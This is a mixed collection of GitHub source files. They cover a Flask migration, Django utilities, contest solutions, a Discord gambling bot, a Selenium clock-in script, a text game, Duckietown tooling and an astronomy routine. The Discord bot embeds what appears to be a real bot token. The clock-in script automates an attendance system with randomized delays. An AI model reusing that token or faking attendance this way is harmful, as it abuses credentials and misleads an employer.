adjust! ###\n op.drop_column('tutorlocation', 'id')\n op.alter_column('tutor', 'hourlyrate',\n existing_type=sa.INTEGER(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"nataliehoang91/flask-db-api","sub_path":"migrations/versions/44194fb1a53f_.py","file_name":"44194fb1a53f_.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9181711570","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom django.template.defaultfilters import floatformat\nfrom shop.util.btc_helper import Coindesk_Exchange, BC, CNB_Exchange\n\nclass ExchangeService(object):\n\n def __init__(self, request):\n btc = Coindesk_Exchange(request)\n cnb = CNB_Exchange(request)\n self.btc_in_dollar = btc.get_btc_in_dollar()\n self.dollar_in_usd = Decimal('1')\n self.dollar_in_czk = cnb.get_dollar_in_czk()\n self.dollar_in_btc = Decimal('1') / self.btc_in_dollar\n\n\n self.koruna_in_usd = Decimal('1')/self.dollar_in_czk\n self.koruna_in_czk = Decimal('1')\n self.koruna_in_btc = Decimal('1') / (btc.get_btc_in_dollar()*self.dollar_in_czk)\n\n def convert_dollar_into(self, amount, currency):\n if currency == 'CZK':\n price = amount * self.dollar_in_czk\n return price\n elif currency == 'USD':\n price = amount * self.dollar_in_usd\n return price\n elif currency == 'BTC':\n price = amount * self.dollar_in_btc\n return price\n else:\n raise KeyError\n\n def convert_koruna_into(self, amount, currency):\n if currency == 'CZK':\n price = amount * self.koruna_in_czk\n return price\n elif currency == 'USD':\n price = amount * self.koruna_in_usd\n return price\n elif currency == 'BTC':\n price = amount * self.koruna_in_btc\n return price\n else:\n raise KeyError\n\n def price_in_usd(self, amount):\n if settings.PRIMARY_CURRENCY == 'CZK':\n new_value = self.convert_koruna_into(amount, 'USD')\n else:\n raise ValueError\n s = floatformat(new_value, 2)\n s = s.replace(',', '.')\n return Decimal(str(s))\n\n def one_btc_in_czk(self):\n if settings.PRIMARY_CURRENCY == 'CZK':\n new_value = self.btc_in_dollar * self.dollar_in_czk\n else:\n raise ValueError\n s = floatformat(new_value, 2)\n s = s.replace(',', '.')\n return Decimal(str(s))\n\n def convert_to_dec(self, price):\n f = round(price, 2)\n s = str(f) + '0000000000'\n n = s.index('.')\n return Decimal(s[0:n+2])\n # Decimal(str(round(price, 2)) + '0')","repo_name":"totoropy/joeshop","sub_path":"vitashop/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20777607545","text":"from django.core.paginator import Paginator\n\ndef pagination(request, posts, num_of_pages):\n paginator = Paginator(posts, num_of_pages)\n page_number = request.GET.get('page')\n return paginator.get_page(page_number)\n\n\ndef select_post(posts):\n new_posts = list()\n for post in posts:\n comments = list()\n for comment in post.commented_post.all().order_by('-date'):\n new_comment = {\n \"author\": comment.author,\n \"image\": comment.author.image.url,\n \"id\": comment.id,\n \"date\": comment.date,\n \"content\": comment.content,\n \"likes\": comment.liked_comment.filter(is_active=True).count(),\n \"like_authors\": [comment_author.author for comment_author in comment.liked_comment.filter(is_active=True)]\n }\n comments.append(new_comment)\n new_post = {\"author\": post.author,\n \"image\": post.author.image.url,\n \"id\": post.id,\n \"likes\": post.liked_post.filter(is_active=True).count(),\n \"like_authors\": [post_author.author for post_author in post.liked_post.filter(is_active=True)],\n \"date\": post.date,\n \"content\": post.content,\n \"comments\": comments,\n }\n new_posts.append(new_post)\n return new_posts","repo_name":"Bartlomiej-Madaj/Network","sub_path":"network/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74429372394","text":"import collections\n\nBIGINT = int(1e9 + 7)\n\nN, M = map(int, input().split())\ninvalid = {int(input()) for _ in range(M)}\ndp = collections.defaultdict(int)\ndp[0] = 1\nfor i in range(1, N + 1):\n if i in invalid:\n dp[i] = 0\n else:\n dp[i] = (dp[i - 1] + dp[i - 2]) % BIGINT\n\nprint(dp[N])\n","repo_name":"yamaton/atcoder","sub_path":"abc129/abc129_c.py","file_name":"abc129_c.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39655513851","text":"\n\n\"\"\"\nGiven an array/list [] of integers , Construct a product array Of same size Such That prod[i] is equal to The Product of all the elements of Arr[] except Arr[i].\n\n\"\"\"\n\ndef product_array(numbers):\n res = []\n i = 0\n\n\n while i < len(numbers):\n nums = numbers[:i] + numbers[i+1:]\n j = 0\n s = 1\n \n for num in nums:\n s *= num\n \n res.append(s) \n i += 1\n \n return res\n\nproduct_array([16,17,4,3,5,2])","repo_name":"jkfer/Codewars","sub_path":"productArray.py","file_name":"productArray.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69904736234","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport time\nfrom openpyxl import load_workbook\nfrom openpyxl import Workbook\nfrom datetime import date, datetime\nimport random\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\ndef work():\n\n current_date_and_time = datetime.now()\n current_hour = current_date_and_time.hour\n\n if current_hour >= 17: # 下班\n min_to_start = random.randint(11, 20)\n else: # 上班\n min_to_start = random.randint(1, 10)\n time.sleep(min_to_start * 60)\n \n chrome_options = Options()\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--headless')\n\n singin_url = \"https://my.ntu.edu.tw/attend/ssi.aspx?from=signNote\"\n driver = webdriver.Chrome(chrome_options=chrome_options) #webdriver.Chrome()\n web = driver.get(singin_url)\n\n try:\n login_button = driver.find_element_by_id(\"divLogin\")\n login_button.click()\n\n name = driver.find_element_by_name(\"user\")\n name.send_keys(\"account\")\n\n password = driver.find_element_by_name(\"pass\")\n password.send_keys(\"password\")\n\n login_button = driver.find_element_by_name(\"Submit\")\n login_button.click()\n except:\n with open('record.txt','a') as f:\n f.write('no need to login again. ')\n f.close()\n\n try:\n if current_hour >= 17: # 下班\n login_button = driver.find_element_by_id(\"btSign2\")\n login_button.click()\n else: # 上班\n login_button = driver.find_element_by_id(\"btSign\")\n login_button.click()\n except:\n with open('record.txt','a') as f:\n f.write('failed at ')\n f.close()\n\n with open('record.txt','a') as f:\n f.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '\\n')\n f.close()\n\n driver.close()\n\nif __name__ == '__main__':\n scheduler = BlockingScheduler()\n scheduler.add_job(work, 'cron', minute=\"00\",hour=\"8,17\",day_of_week=\"mon-fri\")\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n","repo_name":"I-am-ZiHao/Auto_Clock_In","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765272780","text":"from player import Player\r\nfrom enemy import Enemy\r\nfrom enemy import Elf\r\nfrom enemy import Orc\r\nimport random\r\n\r\np1 = Player()\r\ne1 = Enemy(p1.position_x, p1.position_y)\r\n\r\nenemy_list = []\r\nenemy_list.append(e1)\r\n\r\ngameover = False\r\nposition_list = [[\"_\", \"_\", \"_\",\"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"],\r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"]]\r\n\r\ndef update_grid():\r\n\tglobal position_list\r\n\tposition_list = [[\"_\", \"_\", \"_\",\"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"], \r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"],\r\n\t\t\t\t[\"_\", \"_\", \"_\", \"_\", \"_\"]]\r\n\r\n\tposition_list[p1.position_y][p1.position_x] = \"웃\"\r\n\t\r\n\tfor enemy in enemy_list:\r\n\t\tposition_list[enemy.position_y][enemy.position_x] = enemy.symbol\r\n\r\ndef update_game():\r\n\tupdate_grid()\r\n\tkill_enemies()\r\n\tspawn_enemies()\r\n\tprint_game()\r\n\r\ndef game():\r\n\tglobal position_list\r\n\r\n\twhile(not gameover):\r\n\r\n\t\t# RODADA DO PLAYER\r\n\t\twhile(p1.mana > 0):\r\n\t\t\tupdate_game()\r\n\t\t\tjogada = input('diga a sua jogada\\n')\r\n\t\t\tp1.play(jogada, enemy_list)\r\n\r\n\r\n\r\n\t\t# RODADA DOS INIMIGOS\r\n\t\tupdate_game()\r\n\t\tfor enemy in enemy_list:\r\n\t\t\tenemy.play(p1.position_x, p1.position_y, p1)\t\r\n\r\n\t\tupdate_game()\r\n\r\n\t\tgameover_check()\r\n\t\tp1.mana = 2\r\n\t\t\r\ndef kill_enemies():\r\n\tfor enemy in enemy_list:\r\n\t\tif enemy.hp <= 0: \r\n\t\t\tenemy_list.remove(enemy)\r\n\r\n\r\ndef print_game():\r\n\tfor i in range(50):\r\n\t\tprint(\"\")\r\n\tprint(position_list[0])\r\n\tprint(position_list[1])\r\n\tprint(position_list[2])\r\n\tprint(position_list[3])\r\n\tprint(position_list[4])\r\n\tprint(\"\")\r\n\tprint(\"vida do player:\", p1.hp*\"♥ \")\r\n\tprint(\"mana do player:\", p1.mana*\"✰ \")\r\n\tprint(\"vida do inimigo:\", enemy_list[0].hp, \"HP\")\r\n\tprint(\"\")\r\n\r\ndef spawn_enemies():\r\n\tglobal enemy_list\r\n\tglobal p1\r\n\tif len(enemy_list) == 0:\r\n\t\tchoice = random.randint(1,2)\r\n\t\tif choice == 1:\r\n\t\t\tenemy = Elf(p1.position_x, p1.position_y)\r\n\t\telif choice == 2:\r\n\t\t\tenemy = Orc(p1.position_x, p1.position_y)\r\n\r\n\t\tenemy_list.append(enemy)\r\n\r\ndef gameover_check():\r\n\tglobal p1\r\n\tglobal gameover\r\n\tif p1.hp <= 0:\r\n\t\tgameover = True\r\n\t\tcoin = input(\"gameover insert a coin to continue . . .\\n\")\r\n\t\tif coin == \"coin\":\r\n\t\t\tgameover = False\r\n\t\t\treset()\r\n\r\ndef reset():\r\n\tglobal p1\r\n\tglobal e1\r\n\tglobal enemy_list\r\n\r\n\tp1 = Player()\r\n\te1 = Enemy(p1.position_x, p1.position_y)\r\n\r\n\tenemy_list = []\r\n\tenemy_list.append(e1)\r\n\r\n\r\nupdate_grid()\r\nprint_game()\r\ngame()\r\n\r\n# COMENTARIO TESTE DO GIT\r\n#gluglu\r\n\r\n\r\n\r\n","repo_name":"ianobraczka/RPGzada","sub_path":"rpg.py","file_name":"rpg.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22791656278","text":"import argparse\nimport datetime\nimport json\nimport subprocess\n\nimport termcolor\n\nfrom dt_shell import DTCommandAbs, dtslogger\nfrom dt_shell.env_checks import get_dockerhub_username, check_docker_environment\nfrom dt_shell.remote import dtserver_submit, get_duckietown_server_url\nfrom dt_shell.utils import format_exception\n\n\ndef tag_from_date(d):\n # YYYY-MM-DDTHH:MM:SS[.mmmmmm][+HH:MM].\n s = d.isoformat()\n\n s = s.replace(':', '_')\n s = s.replace('T', '_')\n s = s.replace('-', '_')\n s = s[:s.index('.')]\n return s\n\n\ndef build(username, challenge, do_push=True, no_cache=False):\n tag = tag_from_date(datetime.datetime.now())\n df = 'Dockerfile'\n image = '%s/%s:%s' % (username.lower(), challenge.lower() + '-submission', tag)\n\n if not os.path.exists(df):\n msg = 'I expected to find the file \"%s\".' % df\n raise Exception(msg)\n\n cmd = ['docker', 'build',\n '-t', image,\n '-f', df,\n '.',\n ]\n\n if no_cache:\n cmd.append('--no-cache')\n print(cmd)\n p = subprocess.Popen(cmd)\n p.communicate()\n if p.returncode != 0:\n msg = 'Could not run docker build.'\n raise Exception(msg)\n\n if do_push:\n cmd = ['docker', 'push', image]\n p = subprocess.Popen(cmd)\n p.communicate()\n p.communicate()\n\n if p.returncode != 0:\n msg = 'Could not run docker push.'\n\n msg += '\\n\\nI tried to push the tag\\n\\n %s' % image\n\n msg += '\\n\\nYou told me your DockerHub username is \"%s\"' % username\n\n msg += '\\n\\nEither the username is wrong or you need to login using \"docker login\".'\n\n msg += '\\n\\nTo change the username use\\n\\n dts challenges config --docker-username USERNAME'\n raise Exception(msg)\n\n return image\n\n\nclass DTCommand(DTCommandAbs):\n\n @staticmethod\n def command(shell, args):\n check_docker_environment()\n\n token = shell.get_dt1_token()\n\n prog = 'dts challenges submit'\n usage = \"\"\"\n \n\nSubmission:\n\n %(prog)s --challenge NAME\n\n\n\n## Building options\n\nRebuilds ignoring Docker cache\n\n %(prog)s --no-cache\n\n\n\n## Attaching user data\n \nSubmission with an identifying label:\n\n %(prog)s --user-label \"My submission\" \n \nSubmission with an arbitrary JSON payload:\n\n %(prog)s --user-meta '{\"param1\": 123}' \n \n\n \n \n\"\"\"\n parser = argparse.ArgumentParser(prog=prog, usage=usage)\n\n group = parser.add_argument_group(\"Submission identification\")\n parser.add_argument('--challenge',\n help=\"Specify challenge name.\", default=None)\n group.add_argument('--user-label', dest='message', default=None, type=str,\n help=\"Submission message\")\n group.add_argument('--user-meta', dest='metadata', default=None, type=str,\n help=\"Custom JSON structure to attach to the submission\")\n\n group = parser.add_argument_group(\"Building settings.\")\n group.add_argument('--no-push', dest='no_push', action='store_true', default=False,\n help=\"Disable pushing of container\")\n group.add_argument('--no-submit', dest='no_submit', action='store_true', default=False,\n help=\"Disable submission (only build and push)\")\n group.add_argument('--no-cache', dest='no_cache', action='store_true', default=False)\n\n group.add_argument('-C', dest='cwd', default=None, help='Base directory')\n\n parsed = parser.parse_args(args)\n\n do_push = not parsed.no_push\n\n if parsed.cwd is not None:\n dtslogger.info('Changing to directory %s' % parsed.cwd)\n os.chdir(parsed.cwd)\n\n if not os.path.exists('submission.yaml'):\n msg = 'Expected a submission.yaml file in %s.' % (os.path.realpath(os.getcwd()))\n raise Exception(msg)\n\n sub_info = read_submission_info('.')\n\n if parsed.message:\n sub_info.user_label = parsed.message\n if parsed.metadata:\n sub_info.user_payload = json.loads(parsed.metadata)\n if parsed.challenge:\n sub_info.challenge_name = parsed.challenge\n\n username = get_dockerhub_username(shell)\n\n hashname = build(username, sub_info.challenge_name, do_push, no_cache=parsed.no_cache)\n\n data = {'hash': hashname,\n 'user_label': sub_info.user_label,\n 'user_payload': sub_info.user_payload,\n 'protocols': sub_info.protocols}\n\n if not parsed.no_submit:\n submission_id = dtserver_submit(token, sub_info.challenge_name, data)\n url = get_duckietown_server_url() + '/humans/submissions/%s' % submission_id\n url = href(url)\n\n manual = href('http://docs.duckietown.org/DT18/AIDO/out/')\n ID = termcolor.colored(submission_id, 'cyan')\n msg = '''\n\nSuccessfully created submission {ID}.\n\nYou can track the progress at:\n\n {url}\n \nYou can also use the command `follow` to follow its fate:\n\n {P} dts challenges follow --submission {ID}\n \nYou can speed up the evaluation using your own evaluator:\n\n {P} dts challenges evaluator --submission {ID}\n\nFor more information, see the manual at {manual}\n \n'''.format(ID=ID, P=dark('$'), url=url, manual=manual)\n\n if hasattr(shell, 'sprint'):\n shell.sprint(msg)\n else:\n print(msg)\n\n\ndef dark(x):\n return termcolor.colored(x, attrs=['dark'])\n\n\ndef href(x):\n return termcolor.colored(x, 'blue', attrs=['underline'])\n\n\nclass CouldNotReadInfo(Exception):\n pass\n\n\nclass SubmissionInfo(object):\n def __init__(self, challenge_name, user_label, user_payload, protocols):\n self.challenge_name = challenge_name\n self.user_label = user_label\n self.user_payload = user_payload\n self.protocols = protocols\n\n\ndef read_submission_info(dirname):\n bn = 'submission.yaml'\n fn = os.path.join(dirname, bn)\n\n try:\n data = read_yaml_file(fn)\n except Exception as e:\n raise CouldNotReadInfo(format_exception(e))\n try:\n known = ['challenge', 'protocol', 'user-label', 'user-payload', 'description']\n challenge_name = data.pop('challenge')\n protocols = data.pop('protocol')\n if not isinstance(protocols, list):\n protocols = [protocols]\n user_label = data.pop('user-label', None)\n user_payload = data.pop('user-payload', None)\n description = data.pop('description', None)\n if data:\n msg = 'Unknown keys: %s' % list(data)\n msg += '\\n\\nI expect only the keys %s' % known\n raise Exception(msg)\n return SubmissionInfo(challenge_name, user_label, user_payload, protocols)\n except Exception as e:\n msg = 'Could not read file %r: %s' % (fn, e)\n raise CouldNotReadInfo(msg)\n\n\nimport os\n\n# noinspection PyUnresolvedReferences\n\nimport yaml\n\n\ndef read_yaml_file(fn):\n if not os.path.exists(fn):\n msg = 'File does not exist: %s' % fn\n raise Exception(msg)\n\n with open(fn) as f:\n data = f.read()\n\n try:\n return yaml.load(data, Loader=yaml.Loader)\n except Exception as e:\n msg = 'Could not read YAML file %s:\\n\\n%s' % (fn, e)\n raise Exception(msg)\n","repo_name":"aroumie1997/duckietown-shell-commands","sub_path":"challenges/submit/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17129217034","text":"#\n# 1. MAKE SURE USERS CANNOT GAMBLE MORE THAN USER HAS - TJEK\n# 2. MAKE A BETTER MESSAGE THAT TELLS HOW MUCH USER HAS TOTAL AFTER GAMBLING - TJEK\n# 3. MAKE A ADD FUNCTION\n# 4. MAKE A MAX AMOUNT THEY CAN ADD\n# 5. MAKE THEY HAVE TO ADD MORE THAN 0\n# 6. INVESTIGATE HOW THE BOT CAN MAKE SOUND\n\n# OTAyMjQ2MzY1ODAxODg5ODYy.YXboaA.seK0SNH9OMn22hGVLsCP9jOKH3k\nimport discord\nfrom gamba_service import GambaService\ngs = GambaService()\n\n\n# GAMBLING BIKS\n# 1. COMMAND TO JOIN - SAVE USER IN A LIST\n# 2. COMMAND TO GAMBLE MONEY\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Bot is running')\n\n@client.event\nasync def on_message(message):\n print(message)\n print(message.author.name)\n print(message.content)\n print(message.author.id)\n\n # If the author of the message is our bot then dont do anything aka return\n if message.author == client.user:\n return\n\n if not message.content.startswith('$'):\n return\n\n if message.content == '$join':\n gs.new_user(message.author.id, message.author.name)\n await message.channel.send(message.author.name + ' has joined the gambling')\n\n if message.content == '$status':\n status = gs.get_status(message.author.id)\n await message.channel.send(status)\n\n if message.content.startswith('$gamble'):\n result = gs.gamble(message.author.id, message.content)\n await message.channel.send(result)\n\n if message.content.startswith('$add'):\n add = gs.add(message.author.id, message.content)\n await message.channel.send(add)\n\n\n\n\n\n\nclient.run('OTAyMjQ2MzY1ODAxODg5ODYy.YXboaA.seK0SNH9OMn22hGVLsCP9jOKH3k')","repo_name":"NkErMi/GambaBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332181388","text":"from Library.AikeVideo import CAikeVideo\r\nimport Library.TestProgressBar as tpb\r\nimport threading\r\n\r\n\r\ndef StartDownLoad(app):\r\n dwnFilePath = 'download\\\\VideoList.txt'\r\n with open(dwnFilePath, 'r', encoding='utf-8') as file:\r\n fileInfo = file.read()\r\n fileInfo = fileInfo.strip()\r\n UrlList = fileInfo.splitlines()\r\n for i, url in enumerate(UrlList):\r\n print('the %d url is %s' % (i + 1, url))\r\n aik = CAikeVideo(url, app)\r\n aik.DoDownloadLink()\r\n\r\n\r\ndef main():\r\n app = tpb.App()\r\n t = threading.Thread(target=StartDownLoad, args=(app,))\r\n t.start()\r\n app.MainLoop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jy03599066/AikeVideoDownloader","sub_path":"MyVideoDownloader.py","file_name":"MyVideoDownloader.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38264264586","text":"# !/usr/bin/env python\n# -*-coding: utf-8 -*-\n\n\ndef removeDuplicates(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n i = 0\n for n in nums:\n if i < 2 or n > nums[i - 2]:\n nums[i] = n\n i += 1\n return i\n","repo_name":"hyt0617/leetcode","sub_path":"80-89/lc_80.py","file_name":"lc_80.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16097951828","text":"# A program to tell a user whether it is a weekday or a weekend. \n# Author: Ryan Cox\n\n\n# importing the datetime. \nfrom datetime import date\n\n\n# Getting todays date from date.today(). See readme for reference. \n# Also the day of the week returned as an integer by weekday().\n# The current day of the week as an integer saved under weekNum, i.e. Monday = 0, Tuesday = 1. \nweekNum = date.today().weekday()\n\n\n# If weekNum is equal to or less than 4 (Monday - Friday), then it is a weekday. \nif weekNum <= 4:\n print(\"Yes, unfortunately today is a weekday.\")\n\n#Otherwise it is a weekend. \nelse:(\"It is the weekend, yay!\") ","repo_name":"RYANCOX00/PANDS_PROBLEM_SHEETS","sub_path":"4.Weekday/weekday.py","file_name":"weekday.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14819303459","text":"import os\nimport signal\nimport subprocess\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef magic_trace(output=\"trace.fxt\", magic_trace_cache=\"/tmp/magic-trace\"):\n pid = os.getpid()\n if not os.path.exists(magic_trace_cache):\n print(f\"Downloading magic_trace to: {magic_trace_cache}\")\n subprocess.run(\n [\n \"wget\",\n \"-O\",\n magic_trace_cache,\n \"-q\",\n \"https://github.com/janestreet/magic-trace/releases/download/v1.0.2/magic-trace\",\n ]\n )\n subprocess.run([\"chmod\", \"+x\", magic_trace_cache])\n args = [magic_trace_cache, \"attach\", \"-pid\", str(pid), \"-o\", output]\n p = subprocess.Popen(args, stderr=subprocess.PIPE, encoding=\"utf-8\")\n while True:\n x = p.stderr.readline()\n print(x)\n if \"Attached\" in x:\n break\n try:\n yield\n finally:\n p.send_signal(signal.SIGINT)\n r = p.wait()\n print(p.stderr.read())\n p.stderr.close()\n if r != 0:\n raise ValueError(f\"magic_trace exited abnormally: {r}\")\n","repo_name":"pytorch/pytorch","sub_path":"functorch/dim/magic_trace.py","file_name":"magic_trace.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"17596411040","text":"from argparse import ArgumentParser\nimport subprocess\nfrom subprocess import Popen, PIPE\nfrom os import listdir\nfrom os.path import isfile, join\nimport time\nimport psutil\n\nsupported_langs = [\"python\", \"go\"]\n\ndef run_test():\n if args.lang == supported_langs[0]:\n return psutil.Popen(\"python \" + args.prog, stdout=PIPE, stdin=f)\n if args.lang == supported_langs[1]:\n return psutil.Popen(\"go run \" + args.prog, stdout=PIPE, stdin=f)\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('-lang', dest=\"lang\", required=True)\n parser.add_argument('-prog', dest=\"prog\", required=True)\n parser.add_argument('-test', dest=\"test\", required=True)\n parser.add_argument('-time', dest=\"time\", type=int, default=-1, required=False)\n parser.add_argument('-mem', dest=\"mem\", type=int, default=-1, required=False)\n args = parser.parse_args()\n print('vars args', vars(args))\n\n inFiles = [join(args.test, f) for f in listdir(args.test) if isfile(join(args.test, f)) & f.endswith(\".in\")]\n ansFiles = [join(args.test, f) for f in listdir(args.test) if isfile(join(args.test, f)) & f.endswith(\".ans\")]\n\n out = []\n outReal = []\n outTime = []\n outMem = []\n\n for a in ansFiles:\n f = open(a)\n outReal.append(f.read())\n\n for i in inFiles:\n f = open(i)\n start = time.time()\n\n if args.lang not in supported_langs:\n print(\"Language not supported: \" + args.lang)\n exit()\n else:\n p = run_test()\n t = p.memory_info()\n out.append(p.stdout.read().decode())\n end = time.time()\n\n outMem.append(t[3])\n outTime.append(end-start)\n \n out = [s.replace(\"\\r\", \"\") for s in out]\n\n for i in range(len(out)):\n a = out[i]\n b = outReal[i]\n t = outTime[i]\n m = outMem[i]\n print(\"Testing input \" + inFiles[i])\n if a == b:\n if args.time >= 0:\n if t > args.time:\n print(\"\\tTest took too long\")\n print(\"\\tTime: \" + str(t))\n continue\n \n if args.mem >= 0:\n if m > args.mem:\n print(\"\\tTest used too much memory\")\n print(\"\\tMemory: \" + str(m))\n continue\n\n print(\"\\tTest succeeded\")\n else:\n print(\"\\tTest failed\")\n print(\"\\tExpected: \" + b)\n print(\"\\tReceived: \" + a)\n\n","repo_name":"fhartvigmark/kattispy","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37556654797","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n 2016-06-16, 2016M-1.0 lzj\n Bias and flat merge\n For bok\n\"\"\"\n\n\nimport numpy as np\nfrom astropy.io import fits\nfrom common import *\nfrom .rm_os import rm_os\nfrom .constant import const\n\n\ndef merge_bias(bias_list, out_bias_file, basedir=\"\", overwrite=False):\n \"\"\" Merge bias with median values\n args:\n bias_list: bias file list or list file\n out_bias_file: output filename\n basedir: path added to files in list\n debug: debug level\n overwrite: if target exists, overwrite or not\n returns:\n 1 if ok, 0 or -1 for error\n \"\"\"\n # process global debug level\n global debug\n if \"debug\" not in globals():\n debug = 0\n log = logger(out_bias_file[0:-4]+'log', \"MergeBias\", debug)\n\n (files, n_file) = list_expand(bias_list, basedir=basedir, log=log)\n if not is_list_exists(files, log=log) :\n log.write(\"NOT all files in list exist. Abort!\", -1)\n return -1\n\n if not overwrite_check(overwrite, [out_bias_file], log=log) :\n log.write(\"Abort!\", -1)\n return -1\n\n data_cube = np.empty([n_file, const.n_amp, const.amp_ny, const.amp_nx], dtype=np.float64)\n\n # load data into cube, overscan removed\n for f in range(n_file) :\n log.write(\"#{:>3d}/{:<3d} Loading: {:s}\".format(f + 1, n_file, files[f]))\n hdulist = fits.open(files[f])\n for a in range(const.n_amp) :\n data_cube[f, a] = rm_os(hdulist[a + 1].data, log)\n hdulist.close()\n\n # get median\n log.write(\"Merging....\")\n bias_data = np.float32(np.median(data_cube, axis=0))\n\n # generate fits structure and save to new file\n new_hdulist = fits.HDUList()\n pri_hdu = fits.PrimaryHDU(header=hdulist[0].header)\n #pri_hdu.header.append((\"BIASCNT\", n_file, \"Bias files count used in this merge\"))\n #pri_hdu.header.append((\"BIASDATE\", now_str(), \"Bias process time\"))\n pri_hdu.header.update(BIASCNT=(n_file, \"Bias files count used in this merge\"),\n BIASDATE=(now_str(), \"Bias process time\"))\n new_hdulist.append( pri_hdu )\n for a in range(const.n_amp) :\n img_hdu = fits.ImageHDU(data=bias_data[a], header=hdulist[a + 1].header)\n new_hdulist.append(img_hdu)\n\n log.write('Save bias to `{}`'.format(out_bias_file))\n new_hdulist.writeto(out_bias_file, clobber=overwrite)\n\n log.close()\n","repo_name":"RapidLzj/2016M","sub_path":"bok/merge_bias.py","file_name":"merge_bias.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36788514538","text":"#!/usr/bin/env python\n\n\"\"\"Governance related constants and helper functions used within the Container.\"\"\"\n\n__author__ = 'Stephen P. Henrie, Michael Meisinger'\n\nfrom pyon.core import (bootstrap, MSG_HEADER_ACTOR, MSG_HEADER_ROLES, MSG_HEADER_OP, MSG_HEADER_RESOURCE_ID,\n MSG_HEADER_VALID, MSG_HEADER_USER_CONTEXT_ID)\nfrom pyon.core.bootstrap import IonObject\nfrom pyon.core.exception import BadRequest, Inconsistent\nfrom pyon.ion.resource import RT, PRED, OT\nfrom pyon.util.containers import get_safe, get_ion_ts_millis\nfrom pyon.util.log import log\n\n# These constants are ubiquitous, so define in the container\nDEFAULT_ACTOR_ID = 'anonymous'\nANONYMOUS_ACTOR = DEFAULT_ACTOR_ID\n\nMODERATOR_ROLE = 'MODERATOR' # Can act upon resource within the specific Org, managerial permissions in Org\nOPERATOR_ROLE = 'OPERATOR' # Can act upon resource within the specific Org, action permissions in Org\nMEMBER_ROLE = 'MEMBER' # Can access resources within the specific Org\nSUPERUSER_ROLE = 'SUPERUSER' # Can act upon resources across all Orgs with superuser access\n\n# Decorator names for service operations and their parameters\nDECORATOR_OP_VERB = \"OperationVerb\"\nDECORATOR_ALWAYS_VERIFY_POLICY = \"AlwaysVerifyPolicy\"\nDECORATOR_RESOURCE_ID = \"ResourceId\"\nDECORATOR_USER_CONTEXT_ID = \"UserContextId\"\n\n\ndef get_role_message_headers(org_roles):\n \"\"\"\n Iterate the Org(s) that the user belongs to and create a header that lists only the\n role names per Org (governance name) assigned to the user,\n e.g. {'ION': ['MEMBER', 'OPERATOR'], 'Org2': ['MEMBER']}\n \"\"\"\n role_header = dict()\n try:\n for org in org_roles:\n role_header[org] = []\n for role in org_roles[org]:\n role_header[org].append(role.governance_name)\n\n except Exception:\n log.exception(\"Cannot build role message header\")\n\n return role_header\n\n\ndef build_actor_header(actor_id=None, actor_roles=None):\n \"\"\"\n 